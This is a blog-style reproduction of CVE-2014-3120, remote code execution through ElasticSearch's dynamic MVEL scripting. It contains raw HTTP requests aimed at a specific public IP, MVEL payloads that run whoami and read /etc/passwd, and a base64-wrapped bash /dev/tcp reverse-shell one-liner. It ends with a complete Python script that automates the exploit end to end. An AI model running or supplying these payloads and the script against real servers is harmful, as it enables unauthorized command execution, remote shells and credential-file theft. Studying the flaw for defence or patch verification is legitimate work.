Database Security: ElasticSearch Vulnerability Reproduction

Posted by kkrystle on 2024-08-09

CVE-2014-3120 remote command execution

1. Vulnerability details

Old versions of ElasticSearch (before 1.2.0) accept dynamic scripts inside search requests, with MVEL as the default scripting language, so that complex operations can be expressed in a query. MVEL scripts can call arbitrary Java classes and run without any sandbox, so an unauthenticated request to the HTTP API (port 9200 by default) executes arbitrary code on the server. The MVEL snippet used here spawns a process and captures its output; useDelimiter("\\A") anchors the Scanner at start-of-input so that next() returns the whole stdout as one token:

import java.io.*;
new java.util.Scanner(Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\A").next(); 

2. Reproduction

Browse to http://47.236.138.222:9200/ to confirm the service is reachable.

Modify the request in Burp Repeater and use the _search endpoint to receive the payload's output. Note that script_fields are evaluated once per search hit: if the index holds no documents, the search returns no hits and the script never runs. So first write one document (the request below creates index helloword, type hello), and only then does the injection succeed.

POST /helloword/hello HTTP/1.1
Host: 47.236.138.222:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

{
"name":"esdemo"
}

Then send the script payload to _search and read the command output from the command field of the returned hit:

{
	"size": 1,
	"script_fields":{
		"command": {
			"script": "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();"
		}
	}
}

Reading /etc/passwd works the same way, by replacing whoami with cat /etc/passwd.

Reverse shell. The one-liner to run on the target:
bash -i >&/dev/tcp/192.168.226.130/7777 0>&1

Runtime.exec(String) splits its argument on whitespace and does not go through a shell, so the redirections above would never be interpreted. The one-liner is therefore base64-encoded and wrapped with bash brace expansion ({echo,X} expands to "echo X"), producing a command whose only spaces separate bash, -c and the pipeline, so bash -c receives the whole pipeline as a single argument:
bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMjI2LjEzMC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}

Construct the payload:

{
	"size": 1,
	"script_fields":{
		"command": {
			"script": "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMjI2LjEzMC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}\").getInputStream()).useDelimiter(\"\\\\A\").next();"
		}
	}
}

Start a listener and resend the request (failed). The most likely cause is visible in the payload itself: the target is a public host, while the callback address 192.168.226.130 is a private RFC 1918 address on the attacker's LAN that the target cannot route to; the listener must sit on an address reachable from the target. Also expect the _search request to hang while a shell is alive, because Scanner.next() only returns once the spawned process closes its stdout.
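The whole procedure as one script, added here as an example and not part of the original write-up: it rewrites a shell one-liner into the brace-expansion form used above (reproducing the exact string from the reverse-shell step), builds the script_fields body with the correct escaping of the \A delimiter, checks for an empty index before searching, and parses the command output out of the response. The base URL 127.0.0.1:9200 and the small HTTP helper are assumptions; the index and type names are the ones from the indexing request above.

```python
"""CVE-2014-3120 helper: builds the MVEL script_fields payload, wraps a
shell one-liner so Runtime.exec(String) can run it, and reads the command
output back out of the _search response.  Target URL below is an
assumption, not a value from the write-up."""
import base64
import json
import urllib.error
import urllib.request
from typing import Optional

BASE_URL = "http://127.0.0.1:9200"      # assumed; the write-up targeted another host
INDEX, DOC_TYPE = "helloword", "hello"  # index/type used by the write-up's first request

# MVEL snippet from the write-up with the command left as a placeholder.
# useDelimiter("\\A") anchors the Scanner at start-of-input, so next()
# returns the whole stdout of the spawned process as one token.
MVEL_TEMPLATE = (
    "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec({cmd})"
    '.getInputStream()).useDelimiter("\\\\A").next();'
)


def wrap_for_exec(shell_cmd: str) -> str:
    """Rewrite a shell one-liner so Runtime.exec(String) passes it intact.

    exec(String) tokenizes on whitespace and never invokes a shell, so
    redirections such as >&/dev/tcp/... would reach bash as separate
    argv entries.  Base64 plus brace expansion ({echo,X} expands to
    'echo X') yields a line whose only spaces follow 'bash' and '-c',
    so bash -c receives the whole pipeline as its single argument.
    """
    b64 = base64.b64encode(shell_cmd.encode()).decode()
    return f"bash -c {{echo,{b64}}}|{{base64,-d}}|{{bash,-i}}"


def build_payload(cmd: str, size: int = 1) -> dict:
    """Return the _search body that runs `cmd` through a script_field.

    json.dumps(cmd) doubles as a Java string literal (quotes and
    backslashes escaped), so commands containing quotes stay intact.
    """
    script = MVEL_TEMPLATE.format(cmd=json.dumps(cmd))
    return {"size": size, "script_fields": {"command": {"script": script}}}


def payload_json(cmd: str) -> str:
    """Wire form of build_payload(); JSON escaping doubles the backslashes
    of the delimiter, which is why the request body shows four of them."""
    return json.dumps(build_payload(cmd))


def extract_output(search_response: dict) -> Optional[str]:
    """Pull the script_field result out of an ES 1.x _search response.

    script_fields are evaluated per hit, so an empty index produces no hits
    and the script never runs: that is the 'write one document first' step.
    """
    hits = search_response.get("hits", {}).get("hits", [])
    if not hits:
        return None
    value = hits[0].get("fields", {}).get("command")
    if isinstance(value, list):          # ES 1.x returns field values as arrays
        return value[0] if value else None
    return value


def _http(method: str, path: str, body: Optional[dict] = None) -> dict:
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(BASE_URL + path, data=data, method=method,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.loads(resp.read())


def run_command(cmd: str) -> Optional[str]:
    """Index a document if the index is empty, then run `cmd` via _search."""
    try:
        empty = _http("POST", f"/{INDEX}/_search", {"size": 0})["hits"]["total"] == 0
    except urllib.error.HTTPError:       # index does not exist yet -> 404
        empty = True
    if empty:
        _http("POST", f"/{INDEX}/{DOC_TYPE}", {"name": "esdemo"})
        _http("POST", f"/{INDEX}/_refresh")  # make the new document searchable
    return extract_output(_http("POST", f"/{INDEX}/_search", build_payload(cmd)))


if __name__ == "__main__":
    print(run_command("whoami"))
    # A reverse shell needs the wrapped form, and the listener must be reachable
    # from the target (a private 192.168.x.x address will not be, from a public host):
    # print(run_command(wrap_for_exec("bash -i >&/dev/tcp/ATTACKER/7777 0>&1")))
```

Running the file against a live 1.x instance prints the whoami result; the functions are also usable on their own, for example to check that a wrapped command really contains no stray whitespace before sending it.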
